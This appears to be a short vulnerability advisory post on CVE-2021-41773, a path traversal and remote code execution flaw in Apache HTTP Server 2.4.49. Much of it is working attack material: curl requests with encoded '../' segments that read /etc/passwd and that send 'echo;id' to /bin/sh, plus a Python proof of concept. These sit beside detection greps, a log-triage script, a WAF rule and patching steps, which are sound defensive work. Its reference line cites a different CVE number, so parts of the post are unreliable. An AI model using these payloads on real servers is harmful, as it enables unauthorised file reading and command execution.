How CVE-2021-41773 Works
A flaw in Apache HTTP Server 2.4.49 allows attackers to exploit path traversal, leading to remote code execution (RCE). The vulnerability occurs due to improper validation of URLs containing path traversal sequences (`../`). When `mod_proxy` is enabled, an attacker can bypass security checks and access files outside the document root. If CGI scripts are enabled, this can escalate to RCE by injecting malicious input. The issue stems from incomplete fixes in normalization logic, permitting crafted requests to leak system files or execute arbitrary commands.
DailyCVE Form
Platform: Apache HTTP Server
Version: 2.4.49
Vulnerability: Path Traversal → RCE
Severity: Critical
Date: 2021-10-05
What Undercode Say:
Exploitation:
1. Craft Malicious Request:
curl -v "http://target.com/cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd"
2. RCE via CGI:
curl -X POST "http://target.com/cgi-bin/.%2e/%2e%2e/bin/sh" -d "echo;id"
Detection:
1. Check Apache Version:
apache2 -v
2. Log Analysis:
grep -Ei '(\.|%2e)(\.|%2e)(/|%2f)' /var/log/apache2/access.log
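Added example (not part of the original post): a log triage script that goes a step further than a text match by decoding each path segment once, tracking whether the request climbs above the URL root, and using the response status to separate served requests from rejected ones. The log lines are constructed samples and the verdict names are this example's own.

```python
import re
from urllib.parse import unquote

# Method, request URI and status from an Apache common/combined log line.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')

def classify(line):
    """Return a finding dict for a traversal-style request, else None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    path = m["uri"].split("?", 1)[0]            # query string is not a path
    depth, escaped, encoded = 0, False, False
    for raw in path.split("/"):
        seg = unquote(raw)                      # one decoding pass: "%2e" -> "."
        if seg == "..":
            encoded = encoded or raw != ".."    # e.g. ".%2e" or "%2E%2e"
            depth -= 1
            escaped = escaped or depth < 0      # climbed above the URL root
        elif seg not in ("", "."):
            depth += 1
    if escaped:
        verdict = "traversal-served" if m["status"] == "200" else "traversal-attempt"
    elif encoded:
        verdict = "encoded-dot-segment"         # suspicious, stays inside the root
    else:
        return None
    return {"uri": m["uri"], "status": int(m["status"]), "verdict": verdict}

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample entries (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Oct/2021:10:01:02 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1432',
    '203.0.113.7 - - [06/Oct/2021:10:01:09 +0000] "POST /cgi-bin/.%2e/%2e%2e/bin/sh HTTP/1.1" 403 199',
    '198.51.100.4 - - [06/Oct/2021:10:02:00 +0000] "GET /docs/../index.html HTTP/1.1" 200 512',
    '198.51.100.9 - - [06/Oct/2021:10:03:00 +0000] "GET /icons/%2e%2e/index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A "traversal-served" finding (status 200) is the one to escalate first; the other verdicts record probing that the server rejected or that never left the root.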
Mitigation:
1. Patch Immediately:
sudo apt update && sudo apt upgrade apache2
2. Disable CGI:
<Directory "/usr/lib/cgi-bin">
    Options -ExecCGI
</Directory>
3. WAF Rules:
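# nginx in front of Apache: test the raw request URI, because location matching uses the decoded, normalized path
if ($request_uri ~* "(\.|%2e)(\.|%2e)(/|%2f)") { return 403; }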
PoC (Python):
import requests
url = "http://target.com/cgi-bin/.%2e/%2e%2e/etc/passwd"
response = requests.get(url)
print(response.text)
Post-Exploitation Checks:
find /var/www -type f -perm -o+w -ls
References:
Reported By: https://www.cve.org/CVERecord?id=CVE-2024-20439
Extra Source Hub:
Undercode